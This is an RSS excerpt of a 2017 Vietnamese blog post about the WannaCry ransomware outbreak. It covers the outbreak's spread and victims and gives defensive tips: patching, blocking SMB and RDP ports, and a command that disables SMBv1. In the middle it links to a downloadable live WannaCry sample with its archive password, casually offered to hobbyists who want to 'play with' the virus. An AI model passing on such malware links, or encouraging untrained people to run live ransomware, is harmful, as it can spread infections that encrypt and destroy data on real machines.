					<description><![CDATA[2 hôm nay trên các báo đài sôi sục con Ransomware này, nó được phát tán qua công cụ của NSA, một nhóm Hacker do chính phủ Mỹ hậu thuẩn. Hiện nay Ransomware WannaCry  đang lây nhiễm trên gần 100 quốc gia trên thế giới, trong đó có Việt Nam. Hiện nay có lẽ bộ nội vụ [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>2 hôm nay trên các báo đài sôi sục con Ransomware này, nó được phát tán qua công cụ của NSA, một nhóm Hacker do chính phủ Mỹ hậu thuẩn. Hiện nay Ransomware WannaCry  đang lây nhiễm trên gần 100 quốc gia trên thế giới, trong đó có Việt Nam. Hiện nay có lẽ bộ nội vụ Nga, bộ Y tế của Anh đang là nạn nhân nặng nề nhất.</p>
<p>Và dự tính sẽ còn rất nhiều Server bị mã hóa hóa do con Ransomware này do 2 hôm nay là cuối tuần, đến ngày mai các nhân viên IT mới làm việc l</p>
<p><img decoding="async" class="alignnone size-full " src="https://anonyviet.com/wp-content/uploads/2017/05/Wana_Decrypt0r_screenshot.png" width="600" height="453" alt="[Download] Ransomware WannaCry Virus tống tiền mạnh nhất 2017 52" title="[Download] Ransomware WannaCry Virus tống tiền mạnh nhất 2017 82"></p>
<p>Nó là nỗi sợ với đa số người đặc biệt là cái công ty đang sử dụng Windows XP, Windows Server 2008 trở lên. Nếu ai thích vọc và đam mê về virus thì có thể tải con virus WannaCry về nghiên cứu chơi</p>
<p style="text-align: center;"><a href="https://www.fshare.vn/file/3MMZUZ5FEI3L" target="_blank" rel="noopener noreferrer"><span style="font-size: 14pt;"> Download mẫu Virus Ransomware WannaCry</span></a></p>
<p style="text-align: center;"><span style="font-size: 14pt; color: #0000ff;">Pass: anonyviet.com</span></p>
<p style="text-align: justify;">Có một số cách để phòng tránh bị nhiễm con Ransomware WannaCry này là <span style="color: #0000ff;">Update Windows</span> ngay lập tức.</p>
<ul>
<li style="text-align: justify;">Dùng Firewall chặn truy cập các ports 445/139 &amp; 3389</li>
<li style="text-align: justify;">Disable SMBv1 đi bằng gõ lệnh sau trên CMD với quyền administrator</li>
</ul>
<pre class="lang:default decode:true">dism /online /norestart /disable-feature /featurename:SMB1Protocol
</pre>
<p>Xem link hướng dẫn Disable SMB chi tiết của <a href="https://support.microsoft.com/vi-vn/help/2696547/how-to-enable-and-disable-smbv1,-smbv2,-and-smbv3-in-windows-vista,-windows-server-2008,-windows-7,-windows-server-2008-r2,-windows-8,-and-windows-server-2012" target="_blank" rel="noopener noreferrer">Micsrosoft</a>.</p>
<p><b>Nhấn mạnh là con ransomware này ko ảnh hưởng đến máy chạy <span style="color: #0000ff;">Windows 10 &#8220;mới nhất&#8221;</span> nên ko nên test trên W10</b></p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/download-ransomware-wannacry-virus-tong-tien-manh-nhat-2017/feed/</wfw:commentRss>
			<slash:comments>37</slash:comments>
		
		
			</item>
	</channel>
</rss>
